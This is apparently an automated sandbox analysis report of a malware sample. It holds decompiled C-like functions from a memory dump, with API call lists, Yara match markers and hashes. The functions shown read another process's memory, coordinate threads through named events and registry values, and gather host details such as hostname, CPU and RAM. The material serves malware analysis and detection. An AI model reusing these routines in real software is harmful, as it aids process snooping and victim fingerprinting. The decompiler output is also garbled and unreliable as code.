                                                                                    							_t59 =  *_t55(_t90, 0,  &_v616, 0x18, 0);
                                                                                    							__eflags = _t59;
                                                                                    							if(_t59 < 0) {
                                                                                    								goto L18;
                                                                                    							} else {
                                                                                    								_t61 = ReadProcessMemory(_t90, _v612,  &_v584, 0x1d8, 0);
                                                                                    								__eflags = _t61;
                                                                                    								if(_t61 == 0) {
                                                                                    									goto L18;
                                                                                    								} else {
                                                                                    									__eflags = ReadProcessMemory(_t90, _v568,  &_v112, 0x48, 0);
                                                                                    									if(__eflags == 0) {
                                                                                    										goto L18;
                                                                                    									} else {
                                                                                    										_push( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002);
                                                                                    										_t122 = E04ED5785( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002, ReadProcessMemory, __eflags);
                                                                                    										E04EDDAD0(_t118, _t122, 0, 2 + (_v48 & 0x0000ffff) * 2);
                                                                                    										ReadProcessMemory(_t90, _v44, _t122, _v48 & 0x0000ffff, 0);
                                                                                    										E04EB31B0( &_v36, _t118, _t122);
                                                                                    										E04ED573F(_t122);
                                                                                    										 *((intOrPtr*)(_t118 + 0x14)) = 7;
                                                                                    										 *(_t118 + 0x10) = 0;
                                                                                    										 *_t118 = 0;
                                                                                    										_t104 = _v16;
                                                                                    										__eflags = _t104 - 8;
                                                                                    										if(_t104 >= 8) {
                                                                                    											 *_t118 = _v36;
                                                                                    											_v36 = 0;
                                                                                    										} else {
                                                                                    											_t80 =  &(_v20[0]);
                                                                                    											__eflags = _t80;
                                                                                    											if(_t80 != 0) {
                                                                                    												E04EDCC90(_t118,  &_v36, _t80 + _t80);
                                                                                    												_t104 = _v16;
                                                                                    											}
                                                                                    										}
                                                                                    										 *(_t118 + 0x10) = _v20;
                                                                                    										 *((intOrPtr*)(_t118 + 0x14)) = _t104;
                                                                                    										_v16 = 7;
                                                                                    										_v20 = 0;
                                                                                    										_v36 = 0;
                                                                                    										E04EB3170( &_v36);
                                                                                    										__eflags = _v12 ^ _t123;
                                                                                    										return E04ED572E(_v12 ^ _t123);
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t54 = LoadLibraryA("ntdll.dll");
                                                                                    						__eflags = _t54;
                                                                                    						if(_t54 == 0) {
                                                                                    							L18:
                                                                                    							E04EB31B0(_t118, _t118, 0x4efb5d0);
                                                                                    							__eflags = _v12 ^ _t123;
                                                                                    							return E04ED572E(_v12 ^ _t123);
                                                                                    						} else {
                                                                                    							goto L9;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					E04EB5DA0(_t90, _t118, _t90, _t118, _t120);
                                                                                    					return E04ED572E(_v12 ^ _t123);
                                                                                    				}
                                                                                    			}

                                                                                    0x04eb6107
                                                                                    0x04eb610b
                                                                                    0x04eb6122
                                                                                    0x04eb6122

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000), ref: 04EB6080
                                                                                    • GetCurrentProcess.KERNEL32 ref: 04EB6088
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EB60AE
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EB60B1
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EB60DE
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EB60E1
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB6128
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB6137
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 04EB6147
                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000), ref: 04EB6188
                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000), ref: 04EB61A1
                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 04EB61EE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$AddressLibraryLoadMemoryProcRead$CurrentHandleModuleOpen
                                                                                    • String ID: IsWow64Process$NtQueryInformationProcess$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 4184825023-3205649337
                                                                                    • Opcode ID: 092f690cc49404bf09f93677515c24cd0f1295c6780559b15cc940085dbbd47e
                                                                                    • Instruction ID: 1e02d4d0d8bcb7ec352a7cd1e297ef6fb68dfc494651bbdad29d27bbea4cdc76
                                                                                    • Opcode Fuzzy Hash: 092f690cc49404bf09f93677515c24cd0f1295c6780559b15cc940085dbbd47e
                                                                                    • Instruction Fuzzy Hash: 2651B471B01219ABEB249FB5DC45BFFBB78FF44305F001159E90AA6280DB78B945CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC9DC0(void* __eflags) {
                                                                                    				long _v8;
                                                                                    				void* _v12;
                                                                                    				int _v16;
                                                                                    				char _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* _t17;
                                                                                    				long _t20;
                                                                                    				void* _t21;
                                                                                    				long _t26;
                                                                                    				int _t36;
                                                                                    				long _t37;
                                                                                    				void* _t43;
                                                                                    				void* _t44;
                                                                                    				void* _t59;
                                                                                    				void* _t62;
                                                                                    				void* _t65;
                                                                                    				void* _t68;
                                                                                    
                                                                                    				_v12 = 0;
                                                                                    				_v16 = 0;
                                                                                    				E04EC9360(_t44,  &_v20, _t59, _t64, __eflags, L"Dispatch");
                                                                                    				_t60 = CloseHandle;
                                                                                    				if(_v20 != 0) {
                                                                                    					L12:
                                                                                    					_t65 = 0;
                                                                                    					__eflags = 0;
                                                                                    					L13:
                                                                                    					_t17 = _v12;
                                                                                    					__eflags = _t17;
                                                                                    					if(_t17 != 0) {
                                                                                    						CloseHandle(_t17);
                                                                                    					}
                                                                                    					return _t65;
                                                                                    				}
                                                                                    				_t71 = _v16;
                                                                                    				_t45 = WaitForSingleObject;
                                                                                    				if(_v16 == 0) {
                                                                                    					while(1) {
                                                                                    						L17:
                                                                                    						_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
                                                                                    						_t80 = _t20;
                                                                                    						if(_t20 == 0) {
                                                                                    						}
                                                                                    						L18:
                                                                                    						_t48 =  &_v8;
                                                                                    						_v8 = 0;
                                                                                    						_t61 = E04EC95F0(_t45,  &_v8, _t60, _t64, _t80);
                                                                                    						if(_t23 == 0) {
                                                                                    							L16:
                                                                                    							_t60 = CloseHandle;
                                                                                    							while(1) {
                                                                                    								L17:
                                                                                    								_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
                                                                                    								_t80 = _t20;
                                                                                    								if(_t20 == 0) {
                                                                                    								}
                                                                                    								goto L18;
                                                                                    							}
                                                                                    						}
                                                                                    						_t56 = _v8;
                                                                                    						if(_v8 == 0) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						_t64 = E04EC98E0(_t45, _t61, _t56, _t48);
                                                                                    						E04ED573F(_t61);
                                                                                    						_t60 = CloseHandle;
                                                                                    						_t68 = _t68 + 8;
                                                                                    						if(_t64 != 0) {
                                                                                    							_t26 = WaitForSingleObject(_t64, 0xbb8);
                                                                                    							_t79 = _t26 - 0x102;
                                                                                    							if(_t26 == 0x102) {
                                                                                    								CloseHandle(_t64);
                                                                                    							}
                                                                                    						}
                                                                                    						while(1) {
                                                                                    							L17:
                                                                                    							_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
                                                                                    							_t80 = _t20;
                                                                                    							if(_t20 == 0) {
                                                                                    							}
                                                                                    							goto L23;
                                                                                    						}
                                                                                    						goto L18;
                                                                                    						L23:
                                                                                    						__eflags = _t20 - 0x1fffffff;
                                                                                    						if(_t20 == 0x1fffffff) {
                                                                                    							do {
                                                                                    								_t21 = SetConsoleCtrlHandler(E04ECA880, 0);
                                                                                    								__eflags = _t21;
                                                                                    							} while (_t21 != 0);
                                                                                    							_t65 = 0x315;
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						__eflags = _t20 - 0x2fffffff;
                                                                                    						if(__eflags != 0) {
                                                                                    							_t64 = OpenThread(0x1fffff, 0, _t20);
                                                                                    							__eflags = _t64;
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L18;
                                                                                    							}
                                                                                    							WaitForSingleObject(_t64, 0xffffffff);
                                                                                    							CloseHandle(_t64);
                                                                                    							continue;
                                                                                    						}
                                                                                    						Sleep(0x7d0);
                                                                                    						_t50 =  &_v8;
                                                                                    						_v8 = 0;
                                                                                    						_t64 = E04EC95F0(_t45,  &_v8, _t60, _t64, __eflags);
                                                                                    						__eflags = _t30;
                                                                                    						if(__eflags == 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						_t57 = _v8;
                                                                                    						__eflags = _v8;
                                                                                    						if(__eflags == 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						_t62 = E04EC98E0(_t45, _t64, _t57, _t50);
                                                                                    						E04ED573F(_t64);
                                                                                    						_t68 = _t68 + 8;
                                                                                    						__eflags = _t62;
                                                                                    						if(__eflags == 0) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						__eflags = WaitForSingleObject(_t62, 0xbb8) - 0x102;
                                                                                    						if(__eflags != 0) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						CloseHandle(_t62);
                                                                                    						E04EB78A0(_t45, L"Dispatch", 0x2fffffff, CloseHandle, _t64, __eflags);
                                                                                    						do {
                                                                                    							_t36 = SetConsoleCtrlHandler(E04ECA880, 0);
                                                                                    							__eflags = _t36;
                                                                                    						} while (_t36 != 0);
                                                                                    						_t65 = 0x315;
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				_t37 = E04EC94A0(WaitForSingleObject, L"Dispatch", CloseHandle, _t64, _t71);
                                                                                    				if(_t37 == 0) {
                                                                                    					goto L17;
                                                                                    				}
                                                                                    				while(_t37 != 0x2fffffff && _t37 != 0x1fffffff) {
                                                                                    					_t64 = OpenThread(0x1fffff, 0, _t37);
                                                                                    					if(_t64 == 0) {
                                                                                    						goto L17;
                                                                                    					}
                                                                                    					WaitForSingleObject(_t64, 0xffffffff);
                                                                                    					if(GetExitCodeThread(_t64,  &_v8) == 0) {
                                                                                    						L8:
                                                                                    						_t43 = E04EC9360(_t45,  &_v20, _t60, _t64, _t77, L"Dispatch");
                                                                                    						_t78 = _t43;
                                                                                    						if(_t43 != 0) {
                                                                                    							goto L17;
                                                                                    						}
                                                                                    						_t37 = E04EC94A0(_t45, L"Dispatch", _t60, _t64, _t78);
                                                                                    						_t79 = _t37;
                                                                                    						if(_t37 != 0) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							goto L17;
                                                                                    						}
                                                                                    					}
                                                                                    					_t77 = _v8 - 0x315;
                                                                                    					if(_v8 == 0x315) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					goto L8;
                                                                                    				}
                                                                                    				E04ECA860();
                                                                                    				goto L12;
                                                                                    			}

                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f49
                                                                                    0x04ec9f4b
                                                                                    0x04ec9f50
                                                                                    0x04ec9f53
                                                                                    0x04ec9f55
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f63
                                                                                    0x04ec9f68
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f75
                                                                                    0x04ec9f81
                                                                                    0x04ec9f90
                                                                                    0x04ec9f97
                                                                                    0x04ec9f99
                                                                                    0x04ec9f99
                                                                                    0x04ec9f9d
                                                                                    0x00000000
                                                                                    0x04ec9f9d
                                                                                    0x04ec9ea0
                                                                                    0x04ec9e09
                                                                                    0x04ec9e10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e16
                                                                                    0x04ec9e32
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e3b
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e55
                                                                                    0x04ec9e5d
                                                                                    0x04ec9e62
                                                                                    0x04ec9e64
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e6b
                                                                                    0x04ec9e70
                                                                                    0x04ec9e72
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x04ec9e72
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e53
                                                                                    0x04ec9e76
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 04EC9360: wsprintfW.USER32 ref: 04EC939E
                                                                                      • Part of subcall function 04EC9360: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                      • Part of subcall function 04EC9360: GetLastError.KERNEL32 ref: 04EC93C1
                                                                                      • Part of subcall function 04EC9360: CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch,00000000,00000001,74E5F750), ref: 04EC9E2C
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9E3B
                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 04EC9E42
                                                                                    • CloseHandle.KERNEL32(00000000,Dispatch), ref: 04EC9E85
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000BB8,00000001,74E5F750), ref: 04EC9EED
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9EF7
                                                                                    • Sleep.KERNEL32(000007D0,Dispatch), ref: 04EC9F16
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 04EC9F61
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9F75
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000), ref: 04EC9F97
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch), ref: 04EC9FAF
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9FC2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9FC5
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000,Dispatch), ref: 04EC9FD9
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC94E0
                                                                                      • Part of subcall function 04EC94A0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                      • Part of subcall function 04EC94A0: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                      • Part of subcall function 04EC94A0: RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC959B
                                                                                      • Part of subcall function 04EC94A0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                      • Part of subcall function 04EC94A0: CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$Handle$ObjectOpenSingleWait$Threadwsprintf$ConsoleCtrlEventHandler$CodeCreateErrorExitLastQuerySleepValue
                                                                                    • String ID: Control$Dispatch
                                                                                    • API String ID: 483187212-3312308793
                                                                                    • Opcode ID: 8e137a60a0533a42ac60d86059029a447ede7aff774ea0b0c398d9cd9f45ae2e
                                                                                    • Instruction ID: 1b59af71d1ca151342ade6e735b25b7723ba85b3bd8c183ec144d51832735936
                                                                                    • Opcode Fuzzy Hash: 8e137a60a0533a42ac60d86059029a447ede7aff774ea0b0c398d9cd9f45ae2e
                                                                                    • Instruction Fuzzy Hash: 83513BB1A00214EFEB2067658E44BBF72A59F9172DF15221CD814A72D2EF74FD0386A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC3E50(intOrPtr* __ecx) {
                                                                                    				void* _t24;
                                                                                    				void* _t25;
                                                                                    				void* _t26;
                                                                                    				void* _t27;
                                                                                    				int _t36;
                                                                                    				intOrPtr* _t42;
                                                                                    
                                                                                    				_t42 = __ecx;
                                                                                    				 *__ecx = 0x4efdda4;
                                                                                    				TerminateThread( *(__ecx + 0x24), 0);
                                                                                    				TerminateProcess( *(_t42 + 0x1c), 0);
                                                                                    				TerminateThread( *(_t42 + 0x20), 0);
                                                                                    				WaitForSingleObject( *(_t42 + 0x28), 0x7d0);
                                                                                    				TerminateThread( *(_t42 + 0x28), 0);
                                                                                    				_t24 =  *(_t42 + 0xc);
                                                                                    				if(_t24 != 0) {
                                                                                    					DisconnectNamedPipe(_t24);
                                                                                    				}
                                                                                    				_t25 =  *(_t42 + 0x10);
                                                                                    				if(_t25 != 0) {
                                                                                    					DisconnectNamedPipe(_t25);
                                                                                    				}
                                                                                    				_t26 =  *(_t42 + 0x14);
                                                                                    				if(_t26 != 0) {
                                                                                    					DisconnectNamedPipe(_t26);
                                                                                    				}
                                                                                    				_t27 =  *(_t42 + 0x18);
                                                                                    				if(_t27 != 0) {
                                                                                    					DisconnectNamedPipe(_t27);
                                                                                    				}
                                                                                    				CloseHandle( *(_t42 + 0xc));
                                                                                    				CloseHandle( *(_t42 + 0x10));
                                                                                    				CloseHandle( *(_t42 + 0x14));
                                                                                    				CloseHandle( *(_t42 + 0x18));
                                                                                    				CloseHandle( *(_t42 + 0x1c));
                                                                                    				CloseHandle( *(_t42 + 0x20));
                                                                                    				CloseHandle( *(_t42 + 0x28));
                                                                                    				CloseHandle( *(_t42 + 0x24));
                                                                                    				 *_t42 = 0x4efd8b0;
                                                                                    				_t36 = CloseHandle( *(_t42 + 8));
                                                                                    				 *_t42 = 0x4efd8c0;
                                                                                    				return _t36;
                                                                                    			}

                                                                                    APIs
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E65
                                                                                    • TerminateProcess.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E6C
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E77
                                                                                    • WaitForSingleObject.KERNEL32(?,000007D0,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E81
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E8C
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E9C
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EA6
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EB0
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EBA
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EC5
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ECA
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ECF
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ED4
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ED9
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EDE
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EE3
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EE8
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EF3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1450516946-0
                                                                                    • Opcode ID: 3bd433265262b524225fd77d7ab0d66ee93e59dc2d9488758f905605a436c22a
                                                                                    • Instruction ID: d02b9531d425e5363f4d25ef64965c06c3cd45f70ef9ee4f422c8f503f353f4b
                                                                                    • Opcode Fuzzy Hash: 3bd433265262b524225fd77d7ab0d66ee93e59dc2d9488758f905605a436c22a
                                                                                    • Instruction Fuzzy Hash: FE11EC31A0062ABFDB216F26DC09F06BFB9FF48761B144216A90892960DB71F871DFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E04ECAD50(void* __ebx, int __ecx, union %anon243 __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v40;
                                                                                    				void _v428;
                                                                                    				short _v628;
                                                                                    				void* _v668;
                                                                                    				struct _MEMORYSTATUSEX _v740;
                                                                                    				struct _SYSTEM_INFO _v776;
                                                                                    				char _v788;
                                                                                    				int _v792;
                                                                                    				int _v796;
                                                                                    				intOrPtr _v800;
                                                                                    				void* _v804;
                                                                                    				char _v808;
                                                                                    				signed int _t77;
                                                                                    				signed int _t79;
                                                                                    				intOrPtr _t81;
                                                                                    				signed int _t89;
                                                                                    				signed int _t93;
                                                                                    				char* _t95;
                                                                                    				intOrPtr _t99;
                                                                                    				signed int _t116;
                                                                                    				signed int _t117;
                                                                                    				signed int _t118;
                                                                                    				signed int _t119;
                                                                                    				void* _t129;
                                                                                    				void* _t130;
                                                                                    				int _t131;
                                                                                    				signed int _t133;
                                                                                    				signed int _t141;
                                                                                    				signed short* _t146;
                                                                                    				signed short* _t148;
                                                                                    				signed int _t156;
                                                                                    				void* _t160;
                                                                                    				signed int _t162;
                                                                                    				signed int _t164;
                                                                                    				signed short* _t165;
                                                                                    				intOrPtr* _t179;
                                                                                    				void* _t181;
                                                                                    				void* _t182;
                                                                                    				signed int _t184;
                                                                                    				signed int _t188;
                                                                                    				signed int _t190;
                                                                                    				void* _t191;
                                                                                    				void* _t193;
                                                                                    
                                                                                    				_t167 = __edi;
                                                                                    				_t136 = __ecx;
                                                                                    				_t190 = (_t188 & 0xfffffff8) - 0x31c;
                                                                                    				_t77 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t77 ^ _t190;
                                                                                    				_t79 =  *0x4f068d0; // 0x0
                                                                                    				_v776.dwOemId = __edx;
                                                                                    				_v792 = __ecx;
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_push(__edi);
                                                                                    				_t195 = _t79;
                                                                                    				if(_t79 == 0) {
                                                                                    					_t131 = E04ED5744(__esi, _t195, 0x3c);
                                                                                    					_t190 = _t190 + 4;
                                                                                    					_t136 = _t131;
                                                                                    					_t79 = E04EB62B0(__ebx, _t131, __edi, _t195);
                                                                                    					 *0x4f068d0 = _t79;
                                                                                    				}
                                                                                    				_t179 =  *_t79;
                                                                                    				if(_t179 != 0) {
                                                                                    					_t81 =  *_t179 + 0x378;
                                                                                    					_push(_t81);
                                                                                    					_v776.dwPageSize = _t81;
                                                                                    					_t133 = E04ED5785(_t136, _t179, __eflags);
                                                                                    					_t190 = _t190 + 4;
                                                                                    					__eflags = _t133;
                                                                                    					if(_t133 == 0) {
                                                                                    						goto L3;
                                                                                    					} else {
                                                                                    						_t6 = _t133 + 0x350; // 0x350
                                                                                    						E04EDDC90(_t6, _t179,  *_t179 + 0x28);
                                                                                    						_t89 =  *0x4f068d0; // 0x0
                                                                                    						_t191 = _t190 + 0xc;
                                                                                    						__eflags = _t89;
                                                                                    						if(__eflags == 0) {
                                                                                    							_t130 = E04ED5744(_t179, __eflags, 0x3c);
                                                                                    							_t191 = _t191 + 4;
                                                                                    							_t89 = E04EB62B0(_t133, _t130, _t167, __eflags);
                                                                                    							 *0x4f068d0 = _t89;
                                                                                    						}
                                                                                    						asm("movups xmm0, [eax+0x4]");
                                                                                    						asm("movups [ebx+0x8], xmm0");
                                                                                    						asm("movups xmm0, [eax+0x14]");
                                                                                    						asm("movups [ebx+0x18], xmm0");
                                                                                    						 *((char*)(_t133 + 0x28)) =  *((intOrPtr*)(_t89 + 0x24));
                                                                                    						 *_t133 = 0x99;
                                                                                    						 *((intOrPtr*)(_t133 + 0x348)) = GetTickCount();
                                                                                    						 *((intOrPtr*)(_t133 + 0x34c)) = GetCurrentProcessId();
                                                                                    						_t93 =  *0x4f068d0; // 0x0
                                                                                    						__eflags = _t93;
                                                                                    						if(__eflags == 0) {
                                                                                    							_t129 = E04ED5744(_t179, __eflags, 0x3c);
                                                                                    							_t191 = _t191 + 4;
                                                                                    							_t93 = E04EB62B0(_t133, _t129, _t167, __eflags);
                                                                                    							 *0x4f068d0 = _t93;
                                                                                    						}
                                                                                    						_t181 =  *(_t93 + 0x28);
                                                                                    						_t12 = _t133 + 0x2c; // 0x2c
                                                                                    						_t95 = memcpy(_t12, _t181, 0x48 << 2);
                                                                                    						_t171 = _t181 + 0x90;
                                                                                    						gethostname(_t95, 0x100);
                                                                                    						asm("movups xmm0, [esp+0x90]");
                                                                                    						_t15 = _t133 + 0x2e8; // 0x2e8
                                                                                    						_t182 = _t15;
                                                                                    						asm("movups [ebx+0x158], xmm0");
                                                                                    						asm("movups xmm0, [esp+0xa8]");
                                                                                    						asm("movups [ebx+0x168], xmm0");
                                                                                    						asm("movups xmm0, [esp+0xbc]");
                                                                                    						asm("movups [ebx+0x178], xmm0");
                                                                                    						 *((short*)(_t133 + 0x188)) = _v628;
                                                                                    						E04EDDAD0(_t181 + 0x90, _t182, 0, 0x5e);
                                                                                    						_t99 = _v800;
                                                                                    						_t19 = _t133 + 0x346; // 0x346
                                                                                    						_t160 = _t19;
                                                                                    						_t193 = _t191 + 0x18;
                                                                                    						_v808 = 0x2f;
                                                                                    						_t141 =  *(_t99 + 0x5c) & 0x0000ffff;
                                                                                    						__eflags = _t141 - 1;
                                                                                    						if(_t141 != 1) {
                                                                                    							__eflags = _t141 - 2;
                                                                                    							if(_t141 == 2) {
                                                                                    								_t156 =  *((intOrPtr*)(_t99 + 0x24)) + 4;
                                                                                    								__eflags = _t156;
                                                                                    								goto L13;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t156 =  *(_t99 + 0x20);
                                                                                    							L13:
                                                                                    							 *((intOrPtr*)( *_t156 + 0x34))(_t182,  &_v808, _t160);
                                                                                    						}
                                                                                    						GetSystemInfo( &_v776);
                                                                                    						 *((short*)(_t133 + 0x14c)) = _v776.dwNumberOfProcessors;
                                                                                    						_v796 = 4;
                                                                                    						_v792 = 4;
                                                                                    						RegOpenKeyW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",  &_v804);
                                                                                    						RegQueryValueExW(_v804, L"~MHz", 0,  &_v792,  &_v788,  &_v796);
                                                                                    						RegCloseKey(_v804);
                                                                                    						 *(_t133 + 0x150) = _v788;
                                                                                    						_v740.dwLength = 0x40;
                                                                                    						GlobalMemoryStatusEx( &_v740);
                                                                                    						 *(_t133 + 0x154) = (_v740.ullTotalPhys << 0x00000020 | _v740.dwMemoryLoad) >> 0x14;
                                                                                    						__imp__CoInitialize(0);
                                                                                    						 *((intOrPtr*)(_t133 + 0x2e4)) = E04EB2DB0(_t133, 0, _t171, _t182);
                                                                                    						__imp__CoUninitialize();
                                                                                    						 *((intOrPtr*)(_t133 + 0x18c)) = _v792;
                                                                                    						__eflags = E04ECAB10(_t133,  &_v428, _t171, _t182, __eflags);
                                                                                    						if(__eflags == 0) {
                                                                                    							_t146 = _a4;
                                                                                    							_t56 = _t133 + 0x190; // 0x190
                                                                                    							_t162 = _t56 - _t146;
                                                                                    							__eflags = _t162;
                                                                                    							do {
                                                                                    								_t116 =  *_t146 & 0x0000ffff;
                                                                                    								_t146 =  &(_t146[1]);
                                                                                    								 *(_t162 + _t146 - 2) = _t116;
                                                                                    								__eflags = _t116;
                                                                                    							} while (__eflags != 0);
                                                                                    						} else {
                                                                                    							_t52 = _t133 + 0x190; // 0x190
                                                                                    							_t182 =  &_v428;
                                                                                    							memcpy(_t52, _t182, 0x19 << 2);
                                                                                    							_t193 = _t193 + 0xc;
                                                                                    							_t171 = _t182 + 0x32;
                                                                                    						}
                                                                                    						_t117 = E04ECAC30(_t133,  &_v428, _t171, _t182, __eflags);
                                                                                    						__eflags = _t117;
                                                                                    						if(_t117 == 0) {
                                                                                    							_t148 = _a8;
                                                                                    							_t65 = _t133 + 0x1f4; // 0x1f4
                                                                                    							_t164 = _t65 - _t148;
                                                                                    							__eflags = _t164;
                                                                                    							do {
                                                                                    								_t118 =  *_t148 & 0x0000ffff;
                                                                                    								 *(_t148 + _t164) = _t118;
                                                                                    								_t148 =  &(_t148[1]);
